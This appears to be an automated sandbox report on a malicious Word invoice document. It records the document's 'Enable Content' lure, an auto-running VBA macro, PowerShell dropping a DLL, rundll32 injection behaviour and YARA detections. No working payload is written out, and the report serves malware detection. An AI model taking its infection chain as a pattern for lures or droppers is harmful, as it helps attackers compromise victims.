Source: Yara match File source: 12.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.380000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.170000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.360000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0 Screenshot OCR: Enable Editing, and then click Enable Content
Source: Document image extraction number: 0 Screenshot OCR: Enable Content
Source: Document image extraction number: 1 Screenshot OCR: Enable Editing, and then click Enable Content
Source: Document image extraction number: 1 Screenshot OCR: Enable Content
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll Jump to dropped file
Very long command line found
Source: unknown Process created: Commandline size = 5493
Source: unknown Process created: Commandline size = 5392
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5392 Jump to behavior
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Wkjjpdqip\ Jump to behavior
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10006417 7_2_10006417
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001A0F1 7_2_1001A0F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10012C05 7_2_10012C05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001806 7_2_10001806
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002208 7_2_10002208
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000240F 7_2_1000240F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000E612 7_2_1000E612
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10005418 7_2_10005418
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000A821 7_2_1000A821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10010223 7_2_10010223
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10018C2B 7_2_10018C2B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001D02D 7_2_1001D02D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10012631 7_2_10012631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10018A33 7_2_10018A33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10014C37 7_2_10014C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10004844 7_2_10004844
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000E044 7_2_1000E044
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10015250 7_2_10015250
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10010672 7_2_10010672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000BE74 7_2_1000BE74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001AA7B 7_2_1001AA7B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000327F 7_2_1000327F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000DE81 7_2_1000DE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10011090 7_2_10011090
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10014A9E 7_2_10014A9E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000CAA3 7_2_1000CAA3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000A6C9 7_2_1000A6C9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000A2D2 7_2_1000A2D2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001C6D9 7_2_1001C6D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000D2DD 7_2_1000D2DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001D4E1 7_2_1001D4E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000D6F0 7_2_1000D6F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000ECFE 7_2_1000ECFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10005F04 7_2_10005F04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10014F04 7_2_10014F04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10009106 7_2_10009106
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001D70B 7_2_1001D70B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000A525 7_2_1000A525
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10009D2F 7_2_10009D2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001CF31 7_2_1001CF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007731 7_2_10007731
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10003336 7_2_10003336
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10003938 7_2_10003938
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007B39 7_2_10007B39
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C145 7_2_1000C145
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10019B4A 7_2_10019B4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10013F4F 7_2_10013F4F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001434E 7_2_1001434E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001135B 7_2_1001135B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C364 7_2_1000C364
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001B165 7_2_1001B165
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001A966 7_2_1001A966
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000F369 7_2_1000F369
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10003B74 7_2_10003B74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007378 7_2_10007378
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10005B7D 7_2_10005B7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10017187 7_2_10017187
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10011F88 7_2_10011F88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10010B8A 7_2_10010B8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10004D90 7_2_10004D90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10013590 7_2_10013590
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001C192 7_2_1001C192
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000BB96 7_2_1000BB96
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10012FA1 7_2_10012FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100193AA 7_2_100193AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10003FAF 7_2_10003FAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000ADAF 7_2_1000ADAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100147B5 7_2_100147B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100109B8 7_2_100109B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000F9BA 7_2_1000F9BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000FFBA 7_2_1000FFBA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10019DBF 7_2_10019DBF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10017BBE 7_2_10017BBE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001DBC4 7_2_1001DBC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100057D4 7_2_100057D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002DDF 7_2_10002DDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000F5E0 7_2_1000F5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10016BE4 7_2_10016BE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001CBE7 7_2_1001CBE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100067EF 7_2_100067EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001BBF1 7_2_1001BBF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100035FC 7_2_100035FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007FFE 7_2_10007FFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10011DFE 7_2_10011DFE
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Invoice 6682363.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module Zvfrgl3zqkd2gw3, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: Invoice 6682363.doc OLE indicator, VBA macros: true
Source: rundll32.exe, 00000006.00000002.2108466850.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105366443.0000000002030000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117339120.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2127284890.0000000002230000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.evad.winDOC@32/7@2/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$voice 6682363.doc Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRCBC7.tmp Jump to behavior
Source: Invoice 6682363.doc OLE indicator, Word Document stream: true
Source: Invoice 6682363.doc OLE document summary: title field not present or empty
Source: Invoice 6682363.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe Console Write: ............6........................... .V.......V.....................h...............#...............................h.......5kU............. Jump to behavior
Source: C:\Windows\System32\msg.exe Console Write: ............6...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K........i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j..... ..............................}..v............0.................i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................~..j....................................}..v....@.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................~..j......i.............................}..v............0...............(.i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j....................................}..v.....M......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j..... ..............................}..v.....N......0...............x.i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7...............^t.j.....Ii.............................}..v....`.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7...............>w.j....................................}..v............0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C...............^t.j.....Ii.............................}..v....`.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C...............>w.j....................................}..v............0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O...............^t.j.....Ii.............................}..v....`.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O...............>w.j....................................}..v............0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0...............HFi.....(....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[...............>w.j....h...............................}..v............0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.8.1.............}..v............0...............HFi.....$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g...............>w.j....................................}..v....0.......0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s...............^t.j.....Ii.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s...............>w.j....................................}..v....0.......0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................^t.j....................................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................>w.j....................................}..v....0.......0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................^t.j.....Ii.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................>w.j....................................}..v....0.......0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................^t.j.....Ii.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................>w.j....................................}..v....0.......0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................^t.j.....Ii.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................>w.j....................................}..v....0.......0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................^t.j....................................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................>w.j....................................}..v....0.......0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................^t.j.....Ii.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................>w.j....................................}..v....0.......0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................^t.j.....Ii.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................>w.j....................................}..v....0.......0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................^t.j.....Ii.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................>w.j....................................}..v....0.......0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................^t.j....................................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................>w.j..... ..............................}..v....0!......0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................^t.j.....Ii.............................}..v.....'......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................>w.j.....(..............................}..v....0)......0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................^t.j.....Ii.............................}..v...../......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................>w.j.....0..............................}..v....01......0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................^t.j.....Ii.............................}..v.....7......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................>w.j.....8..............................}..v....09......0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................^t.j....................................}..v.....?......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................>w.j.....@..............................}..v....0A......0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................^t.j.....Ii.............................}..v.....G......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................>w.j.....H..............................}..v....0I......0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'...............^t.j.....Ii.............................}..v.....O......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'...............>w.j.....P..............................}..v....0Q......0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3...............^t.j.....Ii.............................}..v.....W......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3...............>w.j.....X..............................}..v....0Y......0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?...............^t.j....................................}..v....._......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?...............>w.j.....`..............................}..v....0a......0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K...............^t.j.....Ii.............................}..v.....g......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K...............>w.j.....h..............................}..v....0i......0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W...............^t.j.....Ii.............................}..v.....o......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W...............>w.j.....p..............................}..v....0q......0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c...............^t.j.....Ii.............................}..v.....w......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c...............>w.j.....x..............................}..v....0y......0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o...............^t.j....................................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o...............>w.j....................................}..v....0.......0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{...............^t.j.....Ii.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{...............>w.j....................................}..v....0.......0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................^t.j.....Ii.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................>w.j....................................}..v....0.......0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................^t.j.....Ii.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................>w.j....................................}..v....0.......0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............8.'.+.'.4.M.'.).}.}.c.a.t.c.h.{.}.}.$.W.0.6.G.=.(.(.'.Y.'.+.'.5.1.'.).+.'.U.'.).HFi.....P....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................>w.j....................................}..v....p.......0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................^t.j.....Ii.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................>w.j....................................}..v....P.......0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................^t.j.....Ii.............................}..v............0.......................r....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................>w.j....X...............................}..v............0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ .......^t.j.....Ii.............................}..v....h.......0...............HFi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................>w.j.... ...............................}..v............0................Fi............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....E...............................}..v............0.................i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....E...............................}..v............0.................i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
